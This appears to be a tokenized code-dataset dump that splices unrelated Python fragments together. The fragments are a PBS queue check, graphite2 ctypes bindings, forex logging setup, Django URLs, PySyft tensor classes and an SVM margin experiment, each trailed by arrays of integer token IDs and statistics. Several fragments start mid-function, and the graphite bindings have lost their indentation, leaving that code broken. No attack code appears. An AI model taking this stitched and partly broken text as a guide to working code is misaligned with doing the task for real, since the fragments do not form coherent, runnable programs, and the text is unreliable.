        pbs_executor = deep_get(self.target_config, "executors", "pbs")
        if not pbs_executor:
            return
        pbs = PBS()
        assert hasattr(pbs, "queues")
        for executor in pbs_executor:
            queue = pbs_executor[executor].get("queue")
            if queue not in pbs.queues:
                raise ConfigurationError(
                    self.config, self.file, f"{queue} not in {pbs.queues}"
                )
            if (
                pbs.queue_summary["Queue"][queue]["enabled"] != "True"
                or pbs.queue_summary["Queue"][queue]["started"] != "True"
            ):
                print("Queue Configuration")
                print(json.dumps(pbs.queue_summary, indent=2))
                raise ConfigurationError(
                    self.config,
                    self.file,
                    f"{queue} is not enabled or started properly. Please check your queue configuration",
                )
            self.pbsexecutors.append(executor)
| [
11748,
33918,
198,
11748,
18931,
198,
11748,
302,
198,
198,
6738,
1382,
9288,
13,
12286,
82,
1330,
357,
198,
220,
220,
220,
5550,
38865,
62,
28480,
51,
20754,
62,
25664,
11,
198,
220,
220,
220,
5550,
38865,
62,
28480,
51,
20754,
62,
... | 2.065371 | 5,813 |
# Copyright 2012, SIL International
# All rights reserved.
#
# This library is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation; either version 2.1 of License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should also have received a copy of the GNU Lesser General Public
# License along with this library in the file named "LICENSE".
# If not, write to the Free Software Foundation, 51 Franklin Street,
# suite 500, Boston, MA 02110-1335, USA or visit their web page on the
# internet at http://www.fsf.org/licenses/lgpl.html.
from __future__ import print_function, unicode_literals, division, absolute_import
try:
unicode
except NameError:
unicode = str
from ctypes import *
import ctypes.util
import sys, os, platform
gr2 = cdll.LoadLibrary(os.environ.get('PYGRAPHITE2_LIBRARY_PATH',
ctypes.util.find_library("graphite2")))
tablefn = CFUNCTYPE(c_void_p, c_void_p, c_uint, POINTER(c_size_t))
advfn = CFUNCTYPE(c_float, c_void_p, c_ushort)
fn('gr_engine_version', None, POINTER(c_int), POINTER(c_int), POINTER(c_int))
fn('gr_make_face', c_void_p, c_void_p, tablefn, c_uint)
fn('gr_str_to_tag', c_uint32, c_char_p)
fn('gr_tag_to_str', None, c_uint32, POINTER(c_char))
fn('gr_face_featureval_for_lang', c_void_p, c_void_p, c_uint32)
fn('gr_face_find_fref', c_void_p, c_void_p, c_uint32)
fn('gr_face_n_fref', c_uint16, c_void_p)
fn('gr_face_fref', c_void_p, c_void_p, c_uint16)
fn('gr_face_n_languages', c_ushort, c_void_p)
fn('gr_face_lang_by_index', c_uint32, c_void_p, c_uint16)
fn('gr_face_destroy', None, c_void_p)
fn('gr_face_n_glyphs', c_ushort, c_void_p)
fn('gr_face_info', POINTER(FaceInfo), c_void_p)
fn('gr_face_is_char_supported', c_int, c_void_p, c_uint32, c_uint32)
fn('gr_make_file_face', c_void_p, c_char_p, c_uint)
fn('gr_make_font', c_void_p, c_float, c_void_p)
fn('gr_make_font_with_advance_fn', c_void_p, c_float, c_void_p, advfn, c_void_p)
fn('gr_font_destroy', None, c_void_p)
fn('gr_fref_feature_value', c_uint16, c_void_p, c_void_p)
fn('gr_fref_set_feature_value', c_int, c_void_p, c_uint16, c_void_p)
fn('gr_fref_id', c_uint32, c_void_p)
fn('gr_fref_n_values', c_uint16, c_void_p)
fn('gr_fref_value', c_int16, c_void_p, c_uint16)
fn('gr_fref_label', c_void_p, c_void_p, POINTER(c_uint16), c_int, POINTER(c_uint32))
fn('gr_fref_value_label', c_void_p, c_void_p, c_uint16, POINTER(c_uint16), c_int, POINTER(c_uint32))
fn('gr_label_destroy', None, c_void_p)
fn('gr_featureval_clone', c_void_p, c_void_p)
fn('gr_featureval_destroy', None, c_void_p)
fn('gr_cinfo_unicode_char', c_uint, c_void_p)
fn('gr_cinfo_break_weight', c_int, c_void_p)
fn('gr_cinfo_after', c_int, c_void_p)
fn('gr_cinfo_before', c_int, c_void_p)
fn('gr_cinfo_base', c_size_t, c_void_p)
fn('gr_count_unicode_characters', c_size_t, c_int, c_void_p, c_void_p, POINTER(c_void_p))
fn('gr_make_seg', c_void_p, c_void_p, c_void_p, c_uint32, c_void_p, c_int, c_void_p, c_size_t, c_int)
fn('gr_seg_destroy', None, c_void_p)
fn('gr_seg_advance_X', c_float, c_void_p)
fn('gr_seg_advance_Y', c_float, c_void_p)
fn('gr_seg_n_cinfo', c_uint, c_void_p)
fn('gr_seg_cinfo', c_void_p, c_void_p, c_uint)
fn('gr_seg_n_slots', c_uint, c_void_p)
fn('gr_seg_first_slot', c_void_p, c_void_p)
fn('gr_seg_last_slot', c_void_p, c_void_p)
fn('gr_seg_justify', c_float, c_void_p, c_void_p, c_void_p, c_double, c_int, c_void_p, c_void_p)
fn('gr_slot_next_in_segment', c_void_p, c_void_p)
fn('gr_slot_prev_in_segment', c_void_p, c_void_p)
fn('gr_slot_attached_to', c_void_p, c_void_p)
fn('gr_slot_first_attachment', c_void_p, c_void_p)
fn('gr_slot_next_sibling_attachment', c_void_p, c_void_p)
fn('gr_slot_gid', c_ushort, c_void_p)
fn('gr_slot_origin_X', c_float, c_void_p)
fn('gr_slot_origin_Y', c_float, c_void_p)
fn('gr_slot_advance_X', c_float, c_void_p)
fn('gr_slot_advance_Y', c_float, c_void_p)
fn('gr_slot_before', c_int, c_void_p)
fn('gr_slot_after', c_int, c_void_p)
fn('gr_slot_index', c_uint, c_void_p)
fn('gr_slot_attr', c_int, c_void_p, c_void_p, c_int, c_uint8)
fn('gr_slot_can_insert_before', c_int, c_void_p)
fn('gr_slot_original', c_int, c_void_p)
fn('gr_slot_linebreak_before', None, c_void_p)
(major, minor, debug) = grversion()
if major > 1 or minor > 1 :
fn('gr_start_logging', c_int, c_void_p, c_char_p)
fn('gr_stop_logging', None, c_void_p)
else :
fn('graphite_start_logging', c_int, c_void_p, c_int)
fn('graphite_stop_logging', None)
| [
2,
220,
220,
220,
15069,
2321,
11,
47551,
4037,
198,
2,
220,
220,
220,
1439,
2489,
10395,
13,
198,
2,
198,
2,
220,
220,
220,
770,
5888,
318,
1479,
3788,
26,
345,
460,
17678,
4163,
340,
290,
14,
273,
13096,
198,
2,
220,
220,
220,... | 2.181034 | 2,204 |
from pydantic import BaseModel, Field
import numpy as np
from ..units import Pressure, Temperature, CriticalProperties
| [
6738,
279,
5173,
5109,
1330,
7308,
17633,
11,
7663,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
11485,
41667,
1330,
30980,
11,
34467,
11,
17684,
2964,
18200,
198
] | 4.25 | 28 |
try:
import unittest
except ImportError:
import unittest2 as unittest
from sys import version_info
from mpegdash.parser import MPEGDASHParser
| [
28311,
25,
198,
220,
220,
220,
1330,
555,
715,
395,
198,
16341,
17267,
12331,
25,
198,
220,
220,
220,
1330,
555,
715,
395,
17,
355,
555,
715,
395,
198,
198,
6738,
25064,
1330,
2196,
62,
10951,
198,
6738,
285,
431,
21287,
1077,
13,
... | 3.04 | 50 |
# Copyright 2018 Gehtsoft USA LLC
# Licensed under the license derived from the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://fxcodebase.com/licenses/open-source/license.html
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import __main__
import datetime
import traceback
import argparse
import sys
from forexconnect import fxcorepy
# Log to a file named after the entry-point script (e.g. "sample.py.log"), at INFO level.
logging.basicConfig(filename='{0}.log'.format(__main__.__file__), level=logging.INFO,
                    format='%(asctime)s %(levelname)s %(message)s', datefmt='%m.%d.%Y %H:%M:%S')
# Mirror log records to stdout in addition to the log file.
console = logging.StreamHandler(sys.stdout)
console.setLevel(logging.INFO)
# Attach the console handler to the root logger so every logger inherits it.
logging.getLogger('').addHandler(console)
# function for print available descriptors
| [
2,
15069,
2864,
2269,
4352,
4215,
4916,
11419,
198,
198,
2,
49962,
739,
262,
5964,
10944,
422,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
220,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
35... | 3.287425 | 334 |
import logging
from django.core.management.base import BaseCommand, CommandError
from ngw.extensions.matrix import matrix
| [
11748,
18931,
198,
198,
6738,
42625,
14208,
13,
7295,
13,
27604,
13,
8692,
1330,
7308,
21575,
11,
9455,
12331,
198,
198,
6738,
23370,
86,
13,
2302,
5736,
13,
6759,
8609,
1330,
17593,
628
] | 3.787879 | 33 |
from django.conf.urls import include
from django.contrib import admin
from django.urls import path
# Root URL routing table for the project.
# Requests are dispatched to the first pattern whose prefix matches.
urlpatterns = [
    path('admin/', admin.site.urls),  # built-in Django admin site
    # path('searchableselect/', include('searchableselect.urls')),
    path('', include('page.urls')),  # site root / landing pages
    path('game/', include('game.urls')),  # game app routes
    path('client/', include('client.urls')),  # client app routes
    path('auth/', include('social_django.urls', namespace='social'))  # social-auth login routes
]
| [
6738,
42625,
14208,
13,
10414,
13,
6371,
82,
1330,
2291,
198,
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
198,
6738,
42625,
14208,
13,
6371,
82,
1330,
3108,
198,
198,
6371,
33279,
82,
796,
685,
198,
220,
220,
220,
3108,
10786,
284... | 2.791946 | 149 |
import json
import re
import torch
import random
import syft as sy
from ... import utils
from . import utils as torch_utils
import logging
import numpy as np
class _SyftTensor(object):
"""
Super class for all Syft tensors, that contains all the specific syft functions
"""
def set_id(self, new_id):
"""
This changes the id of a tensor.
:param new_id: a string or integer id
:return: returns self, for convenience.
"""
if(new_id not in self.owner._objects):
if not hasattr(self, 'old_ids'):
self.old_ids = set()
self.old_ids.add(self.id)
self.owner.register_object(self, new_id)
return self
else:
raise KeyError("There is already a tensor with that ID - please choose another.")
@property
@parent.setter
@classmethod
def handle_call(cls, command, owner):
"""
Receive a command and an owner and before sending it downward the syft chain,
Performs different operations like:
- command substitution
- args substitution
- command overloading with special methods or arguments
"""
attr = command['command']
args = command['args']
kwargs = command['kwargs']
has_self = command['has_self']
# Overload methods
if has_self and cls.is_overloaded_method(attr):
self_ = command['self']
result = getattr(self_, attr)(*args, **kwargs)
# Overload functions
elif not has_self and cls.is_overloaded_function(attr):
overload_function = cls.overload_functions.get(attr)
result = overload_function(*args, **kwargs)
else:
# replace a function attr with an existing other
if attr in cls.replaced_functions():
command['command'] = cls.replaced_functions(attr)
# Or do whatever you want, but be careful not to overwrite the args!
# (...)
# Get the next node type and update in command tensorvar with tensorvar.child
next_command, child_type = torch_utils.prepare_child_command(
command, replace_tensorvar_with_child=True)
# Forward the call to the next child
result = child_type.handle_call(next_command, owner)
if result is None:
return result
if not isinstance(result, (int, float, str, bool)):
# Insert the new node just before the wrapper
syft_response = cls.syft_wrap(result, owner)
else:
syft_response = result
return syft_response
def ser(self, private, as_dict=True):
"""
General method for serializing a Syft object. Specific tensors like _PointerTensor
should overload this method.
"""
data = {
'owner': self.owner.id,
'id': self.id,
'torch_type': self.torch_type
}
if self.child is not None and not torch_utils.is_tensor(self.child):
data['child'] = self.child.ser(private, as_dict)
if as_dict:
return {'__{}__'.format(self.__class__.__name__): data}
else:
return json.dumps({'__{}__'.format(self.__class__.__name__): data}) + "\n"
@classmethod
def deser_routing(cls, dct, worker, acquire):
"""
Method analysing the dict given to see which Syft Tensor should deserialized,
and forwarding the call
[Is this case note that the dct param is assumed to have a single key, which is
compatible with our encode/decode process (ex: {'___PointerTensor__': {...} })]
"""
pat = re.compile('__(.+)__')
for key, obj in dct.items(): # A trick, we don't really loop
obj_type = pat.search(key).group(1)
if torch_utils.is_syft_tensor(obj_type):
if obj_type == '_LocalTensor':
return sy._LocalTensor.deser(obj, worker, acquire)
elif obj_type == '_PointerTensor':
return sy._PointerTensor.deser(obj, worker, acquire)
else:
syft_type = torch.guard['syft.' + obj_type]
return syft_type.deser(obj, worker, acquire)
@classmethod
def deser(cls, msg_obj, worker, acquire):
"""
General method for de-serializing a Syft object. Specific tensors like _PointerTensor
should overload this method.
"""
if acquire: # We need to register the info given
syft_obj = cls(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
owner=worker,
id=msg_obj['id'],
skip_register=True
)
if 'child' in msg_obj:
syft_child = cls.deser_routing(msg_obj['child'], worker, acquire)
syft_obj.child = syft_child
syft_child.parent = syft_obj
else: # We point at the info which generally we can't really have
# We make sure we are not creating a duplicate pointer
previous_pointer = worker.get_pointer_to(msg_obj['owner'], msg_obj['id'])
if previous_pointer is None:
syft_obj = sy._PointerTensor(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
location=msg_obj['owner'],
id_at_location=msg_obj['id'],
owner=worker,
id=None,
skip_register=True)
else:
syft_obj = previous_pointer
return syft_obj
def on(self, wrapper):
"""
Used to add a new node at the top of the chain, just before the tensorvar wrapper
Example with _PlusIsMinusTensor:
x = sy.FloatTensor([1, 2, 3]) # the chain is FloatTensor > _LocalTensor
x = sy._PlusIsMinusTensor().on(x) # the chain is FloatTensor > _PlusIsMinusTensor > _LocalTensor
"""
cls = type(self)
# Assign the newly created tensor to the good owner and torch_type
self.torch_type = wrapper.child.torch_type
self.owner = wrapper.child.owner
# Insert self between wrapper and wrapper child
torch_utils.wrap_command_with(wrapper.child, wrapper=self)
torch_utils.wrap_command_with(self, wrapper=wrapper)
# In case wrapper is a variable, do the same with data and grad (if necessary)
if torch_utils.is_variable(wrapper):
wrapper.data = cls().on(wrapper.data)
if torch_utils.is_variable(wrapper.grad):
wrapper.grad = cls().on(wrapper.grad)
if wrapper.grad is None and wrapper.data.dim() > 0:
# create an empty envelope in wrapper.grad
wrapper.init_grad_()
# Build the chain with _PlusIsMinusTensor
wrapper_grad = cls().on(wrapper.grad)
# Insert the gradient within its chain
wrapper.grad.native_set_(wrapper_grad)
return wrapper
def wrap(self):
"""
Wrap a syft node with a torch wrapper
"""
wrapper = torch.guard[self.torch_type]()
self.owner.rm_obj(wrapper.child.id)
wrapper.child = self
torch_utils.fix_chain_ends(wrapper)
return wrapper
@classmethod
def syft_wrap(cls, result, owner):
"""
Wrap a torch node with a syft wrapper
"""
# Insert the new syft node just before the wrapper
syft_wrapper = cls(child=result, owner=owner)
result.parent = syft_wrapper
if torch_utils.is_variable(result.torch_type):
syft_response_data = cls(child=result.data, owner=owner)
result.data.parent = syft_response_data
syft_wrapper.data = syft_response_data
# TODO: same for grad ?
return syft_wrapper
@classmethod
def is_overloaded_method(cls, attr):
"""
State if a function name corresponds to a Syft Tensor method which
overloads a torch method
"""
exclude = ['on', '__init__', 'native___init__', '__repr__', '__str__', 'create_pointer',
'ser', 'deser', 'handle_call']
if attr in exclude:
return False
if hasattr(getattr(cls, attr), '__module__') \
and getattr(cls, attr).__module__ == 'syft.core.frameworks.torch.tensor':
return True
return False
@classmethod
def is_overloaded_function(cls, attr):
"""
State if a function name corresponds to an overloaded function by the Syft
tensor, which declared the corresponding overloading function in
cls.overload_functions
"""
attr = attr.split('.')[-1]
overloaded_functions = [
func for func in dir(cls.overload_functions)
if re.match(r'__(.*)__', func) is None
and func != 'get'
]
return attr in overloaded_functions
@classmethod
def replaced_functions(cls, attr=None):
"""
If attr is none, return all the function substitution a Syft Tensor class
wants to perform.
Else, return the substitution corresponding to attr
"""
if attr is None:
return cls.substitution_table
else:
return cls.substitution_table[attr]
substitution_table = {}
class _PlusIsMinusTensor(_SyftTensor):
"""
Example of a custom overloaded _SyftTensor
Role:
Converts all add operations into sub/minus ones.
"""
# The table of command you want to replace
substitution_table = {
'torch.add': 'torch.add'
}
class overload_functions:
"""
Put here the functions you want to overload
Beware of recursion errors.
"""
@staticmethod
@staticmethod
# Put here all the methods you want to overload
def add(self, arg):
"""
Overload the add method and execute another function or method with the provided args
"""
_response = self.sub(arg)
return _response
def abs(self):
"""
Overload the abs() method and execute another function
"""
return torch.abs(self)
class _TorchObject(object):
"""
This tensor is simply a more convenient way to add custom
functions to all Torch tensor types, including Torch Variable.
Note that it is the parent class of the two following classes:
_TorchTensor and a_TorchVariable
"""
__module__ = 'syft'
def move(self, worker, new_id=None):
"""
Give the end leaf of the chain to worker,
just like if the last elmt was send its child
to worker
self->alice->obj [worker] => self->alice->worker->obj
"""
raise NotImplementedError('Move is not supported anymore.')
if isinstance(worker, (int, str)):
worker = self.owner.get_worker(worker)
if new_id is None:
new_id = random.randint(0, 10e10)
if isinstance(self.child, sy._PointerTensor):
pointer = self.child
else:
pointer = None
if pointer is None:
return self.send(worker, new_id)
command, _ = pointer.compile_command('move',
(worker.id, new_id),
{},
True)
response = pointer.owner.send_torch_command(recipient=pointer.location,
message=command)
return self
| [
11748,
33918,
198,
11748,
302,
198,
11748,
28034,
198,
11748,
4738,
198,
11748,
827,
701,
355,
827,
198,
6738,
2644,
1330,
3384,
4487,
198,
6738,
764,
1330,
3384,
4487,
355,
28034,
62,
26791,
198,
11748,
18931,
198,
11748,
299,
32152,
3... | 2.137064 | 5,647 |
from dataCheck import customerDataCheck
import json
from auth.flaskAuthVerify import tokenVerify
from flask import Blueprint, Response, g
from postgres.databaseConnection import PostgresControll
manager = Blueprint('getSpecJobHistory', __name__, url_prefix='/jobs')
# 특정 고객의 모든 시술 기록을 불러옴
@manager.route('/customer/<customerID>', methods=['GET'])
@tokenVerify
| [
171,
119,
123,
6738,
1366,
9787,
1330,
6491,
6601,
9787,
198,
11748,
33918,
198,
198,
6738,
6284,
13,
2704,
2093,
30515,
13414,
1958,
1330,
11241,
13414,
1958,
198,
6738,
42903,
1330,
39932,
11,
18261,
11,
308,
198,
6738,
1281,
34239,
1... | 2.47619 | 147 |
import numpy as np
class LongTensor:
    """
    LongTensor is a type of Tensor that holds integer values.

    Unlike :class:`Tensor` it carries no gradient buffer: integer tensors
    are typically used for indices or labels, which are not differentiable.
    """
    def __init__(self, value, name='LongTensor', trainable=False):
        """
        :param value: integer value(s); anything ``np.array`` accepts
        :param name: display/registration name for this tensor
        :param trainable: whether the tensor can be updated; stored for
            consistency with :class:`Tensor` (previously this argument was
            accepted but silently discarded)
        """
        # NOTE(review): stored as int32 despite the "Long" name -- kept
        # unchanged for backward compatibility with existing callers.
        self.value = np.array(value, dtype=np.int32)
        self.name = name
        self.trainable = trainable
class Tensor:
    """
    Basic node of the computation graph.

    Holds ``value`` for the forward pass and ``grad`` accumulated during
    backward propagation.
    """
    def __init__(self, value, name='Tensor', dtype=np.float32, trainable=True, grad=None):
        """
        :param value: numpy array, or a plain list (lists are converted)
        :param name: name for the Tensor (used for parameter registration)
        :param dtype: dtype applied when converting a list ``value``
        :param trainable: whether the Tensor can be trained or not
        :param grad: optional pre-allocated gradient buffer
        """
        # Lists are converted with the requested dtype; anything else
        # (e.g. an existing ndarray) is stored as-is.
        self.value = np.array(value, dtype=dtype) if isinstance(value, list) else value
        # Gradient buffer: reuse the caller's if given, otherwise allocate
        # a zero-filled float32 array matching the value's shape.
        self.grad = grad if grad is not None else np.zeros(self.value.shape, dtype=np.float32)
        # Name used when the Tensor is registered as a parameter.
        self.name = name
        # Whether an optimizer is allowed to update this Tensor.
        self.trainable = trainable
| [
11748,
299,
32152,
355,
45941,
198,
198,
4871,
5882,
51,
22854,
25,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
5882,
51,
22854,
318,
257,
2099,
286,
309,
22854,
284,
1394,
37014,
628,
220,
220,
220,
37227,
628,
220,
220,
220,
82... | 2.406534 | 551 |
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 4 18:45:05 2021.
@author: mahdi
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets
from sklearn.datasets import make_blobs
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import NearestCentroid
import statistics
import math
from scipy import stats
from scipy.stats import linregress
import pandas as pd
from sklearn import metrics
from sklearn.model_selection import train_test_split
from sklearn.metrics import hinge_loss
# %% Functions
def unit_vector(vector):
    """
    Normalize *vector* to unit length.

    Parameters
    ----------
    vector : numpy array
        The input vector.

    Returns
    -------
    TYPE : numpy array
        The input scaled to Euclidean norm 1.
    """
    # NOTE(review): a zero vector divides by zero here -- assumed not to occur.
    norm = np.linalg.norm(vector)
    return vector / norm
def angle_between(v1, v2):
    """
    Calculate the angle between two vectors, in radians.

    Parameters
    ----------
    v1 : numpy array
        vector 1.
    v2 : numpy array
        vector 2.

    Returns
    -------
    TYPE :
        The angle between the two vectors in radians, in [0, pi].
    """
    # Normalize both vectors (helper inlined), then take the arccos of
    # their dot product.  The clip guards against tiny floating-point
    # excursions outside [-1, 1] for (anti-)parallel vectors.
    u1 = v1 / np.linalg.norm(v1)
    u2 = v2 / np.linalg.norm(v2)
    cos_angle = np.clip(np.dot(u1, u2), -1.0, 1.0)
    return np.arccos(cos_angle)
def projection_on_line(c_center_1, c_center_2, original_data):
    """
    Project a data point onto the line through both cluster centers.

    Parameters
    ----------
    c_center_1 : numpy 1 by 2 array
        first center coordinates.
    c_center_2 : numpy 1 by 2 array
        second center coordinates.
    original_data : numpy array
        a single data point.

    Returns
    -------
    projection : numpy array
        coordinates of the point projected onto the line connecting the
        two centers.
    """
    # Standard orthogonal projection: offset from the first center,
    # scaled component along the center-to-center direction.
    offset = original_data - c_center_1
    direction = c_center_1 - c_center_2
    scale = np.dot(offset, direction) / np.dot(direction, direction)
    projection = c_center_1 + scale * direction
    return projection
def calculate_center(original_data):
    """
    Calculate the centroid of a set of data points.

    Parameters
    ----------
    original_data : numpy array
        The data points, one point per row.

    Returns
    -------
    center_co : numpy array
        The coordinates of the center point (column-wise mean).
    """
    # Sum over rows divided by the row count == component-wise mean.
    center_co = np.sum(original_data, axis=0) / original_data.shape[0]
    return center_co
def calculate_pvar(pdata):
    """
    Calculate the variance of the data projected on to the line.

    The points in ``pdata`` are assumed to already lie on one line, so
    each displacement from the centroid points in one of two opposite
    directions; the loop converts each displacement into a signed scalar
    coordinate along that line before taking the variance.

    Parameters
    ----------
    pdata : numpy array
        the coordinates of the data projected on the line

    Returns
    -------
    data_var : numpy array
        the variance of the projected data points on the line.
    """
    c_center = calculate_center(pdata)
    # Broadcast the centroid to pdata's shape so subtraction gives the
    # per-point displacement vectors.
    mean_vec = np.full(pdata.shape, c_center)
    temp_disvec = pdata - mean_vec
    temp_vec = []
    for i in range(pdata.shape[0]):
        # Sign relative to an arbitrary reference displacement: row 1.
        # NOTE(review): assumes pdata has >= 2 rows and that neither row 1's
        # displacement nor row i's is the zero vector (unit_vector would
        # divide by zero) -- TODO confirm with callers.
        sign_v = np.dot(unit_vector(temp_disvec[1, :]),
                        unit_vector(temp_disvec[i, :]))
        # Signed distance of point i from the centroid along the line.
        temp_valu = np.sign(sign_v) * np.linalg.norm(temp_disvec[i, :])
        temp_vec.append(temp_valu)
    # temp_vec = np.linalg.norm(temp_disvec, axis=1)
    temp_vec = np.array(temp_vec)
    # Population variance of the signed 1-D coordinates.
    data_var = np.var(temp_vec)
    return data_var
def calculate_dvar(pdata):
    """
    Calculate the variance of the data based on the distance from the
    central point.

    Parameters
    ----------
    pdata : numpy array
        the coordinates of the data projected on the line

    Returns
    -------
    data_var : numpy array
        mean squared Euclidean distance of the points from their centroid.
    """
    # Centroid of the points (helper inlined: column-wise mean).
    centroid = np.sum(pdata, axis=0) / pdata.shape[0]
    # Squared distance of every point from the centroid.
    squared_dists = np.power(np.linalg.norm(pdata - centroid, axis=1), 2)
    # Average the squared distances over all points.
    data_var = np.sum(squared_dists) / pdata.shape[0]
    return data_var
def rotate_data(X_data, y):
    """
    Rotate the data so the line through the two class centers becomes
    horizontal, which makes the later variance calculation easier.

    Parameters
    ----------
    X_data : numpy array
        The data points to rotate, one point per row.
    y : numpy array
        Labels for X_data (+1 / -1).

    Returns
    -------
    X_rotated : numpy array
        The rotated data points.
    """
    # Centroids of the positive and negative classes (helper inlined).
    pos_pts = X_data[y == 1]
    neg_pts = X_data[y == -1]
    center_pos = np.sum(pos_pts, axis=0) / pos_pts.shape[0]
    center_neg = np.sum(neg_pts, axis=0) / neg_pts.shape[0]
    # Slope of the line joining the two centers.
    # NOTE(review): a vertical center line (equal x coordinates) divides
    # by zero here -- assumed not to occur for this data.
    slope = (center_pos[1] - center_neg[1]) / (center_pos[0] - center_neg[0])
    # Rotate by the negative of the line's angle to flatten it.
    theta = -math.atan(slope)
    cos_t, sin_t = np.cos(theta), np.sin(theta)
    rotation_mat = np.array(((cos_t, -sin_t), (sin_t, cos_t)))
    # Apply the rotation to every point.
    X_rotated = np.array([rotation_mat.dot(point) for point in X_data])
    return X_rotated
# %% Generating the data
n_samples_1 = 2000
n_samples_2 = 2000
centers = [[-2, 0.0], [2, 2.0]] # cluster centers
clusters_std = [0.7, 0.7] # cluster std_dev
X, y = make_blobs(n_samples=[n_samples_1, n_samples_2],
centers=centers,
cluster_std=clusters_std,
random_state=0, shuffle=False)
y = np.where(y == 1, 1, -1)
# %% Preprocessing step
scaler = StandardScaler()
# X_s = scaler.fit_transform(X)
X_s = X
X_pos = X_s[y == 1]
X_neg = X_s[y == -1]
center_1 = NearestCentroid()
center_1.fit(X_s, y)
data_centers = center_1.centroids_
c_y = np.array([[1], [-1]])
pos_center = calculate_center(X_pos)
neg_center = calculate_center(X_neg)
print(f'The cluster centers are: {center_1.centroids_}')
# %% calculating S&S for clusters
# Calulate the distance of the centers
distance = np.linalg.norm(data_centers[0, :] - data_centers[1, :])
# First projecting the data on to the line which go through the cetners
X_pro = []
for i in range(X_s.shape[0]):
projected_data = projection_on_line(data_centers[0, :], data_centers[1, :],
X_s[i])
X_pro.append(projected_data)
X_pro = np.array(X_pro)
X_pro_pos = X_pro[y == 1]
X_pro_neg = X_pro[y == -1]
var_x_pos = calculate_pvar(X_pro_pos)
var_x_neg = calculate_pvar(X_pro_neg)
total_var = ((X_pro_pos.shape[0] * var_x_pos) +
(X_pro_neg.shape[0] * var_x_neg)) / (X_pro_pos.shape[0] +
X_pro_neg.shape[0])
sigma = np.sqrt(total_var)
SandS = 20 * np.log10(distance / (6 * sigma))
# Projection of the data on to the X axis
X_rota = rotate_data(X_pro, y)
X_rota_pos = X_rota[y == 1]
X_rota_neg = X_rota[y == -1]
# %% Plotting the data and centeral points
fig, ax = plt.subplots()
ax.scatter(X_s[:, 0], X_s[:, 1], marker="o", s=20,
color=["coral" if y == -1 else "cyan" for y in y])
ax.scatter(data_centers[:, 0], data_centers[:, 1],
color=["lime" if y == 1 else "r" for y in c_y])
# %% plotting the projection on to the line going throught two centers
fig, ax = plt.subplots()
# xmin, xmax = -10, 10
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([xmin, xmax])
# Move left y-axis and bottim x-axis to centre, passing through (0,0)
# ax.spines['left'].set_position('zero')
# ax.spines['bottom'].set_position('zero')
# Eliminate upper and right axes
# ax.spines['right'].set_color('none')
# ax.spines['top'].set_color('none')
# Show ticks in the left and lower axes only
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
# make the box square shape
ax.set_aspect('equal')
ax.scatter(X_pro[:, 0], X_pro[:, 1], marker="o", s=20,
color=["r" if y == -1 else "b" for y in y], alpha=0.5)
ax.scatter(X_s[:, 0], X_s[:, 1], alpha=0.5)
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange(start, end, 3.0))
ax.set_title('Projected and datas')
# %% Plotting the rotated data
fig, ax = plt.subplots()
# xmin, xmax = -5, 0
# ax.set_xlim([xmin, xmax])
# ax.set_ylim([xmin, xmax])
# Move left y-axis and bottim x-axis to centre, passing through (0,0)
# ax.spines['left'].set_position('zero')`
# ax.spines['bottom'].set_position('zero')
# Eliminate upper and right axes
# ax.spines['right'].set_color('none')
# ax.spines['top'].set_color('none')
# Show ticks in the left and lower axes only
# ax.xaxis.set_ticks_position('bottom')
# ax.yaxis.set_ticks_position('left')
# make the box square shape
# ax.set_aspect('equal')
ax.scatter(X_rota[:, 0], X_rota[:, 1], marker="o", s=20,
color=["r" if y == -1 else "b" for y in y])
start, end = ax.get_xlim()
ax.xaxis.set_ticks(np.arange(start, end, 3.0))
# %% Ishtiaque approch
# make a dataframe with following columns
cols = ['iteration', 'C', 'Margin', 'Train_hinge_loss', 'cost_training',
'Test_hinge_loss', 'cost_testing']
lst = []
iteration_num = 10
for i in range(1, iteration_num):
X_train, X_test, y_train, y_test = train_test_split(X_s, y, test_size=0.40,
random_state=1)
i = i
Cs = np.logspace(-1, 2, 1000).tolist()
Cs = np.array(Cs)
clf = svm.SVC(kernel='linear', C=Cs)
C = []
Margin = []
train_errors = []
test_errors = []
number_of_misclassified_train_points = []
number_of_misclassified_test_points = []
Train_hinge_loss = []
cost_training = []
Test_hinge_loss = []
cost_testing = []
for C in Cs:
clf.set_params(C=C)
clf.fit(X_train, y_train)
i = i
w = clf.coef_[0]
y_train_predict = clf.predict(X_train)
train_error = metrics.mean_squared_error(y_train, y_train_predict)
train_errors.append(train_error)
misclassified_train = np.where(y_train != y_train_predict)
number_of_misclassified_train_points.append(misclassified_train)
pred_decision_train = clf.decision_function(X_train)
hinge_loss_train = hinge_loss(y_train, pred_decision_train)
Train_hinge_loss.append(hinge_loss_train)
pred_decision_test = clf.decision_function(X_test)
hinge_loss_test = hinge_loss(y_test, pred_decision_test)
Test_hinge_loss.append(hinge_loss_test)
cost_train = 1/2 * np.dot(w, w) + C * hinge_loss_train
cost_training.append(cost_train)
cost_test = 1/2 * np.dot(w, w) + C * hinge_loss_test
cost_testing.append(cost_test)
# alpha=clf.dual_coef_
# alphas.append(alpha)
# ξ=y_train*clf.decision_function(X_train)
# ξs.append(ξ)
a = -w[0] / w[1]
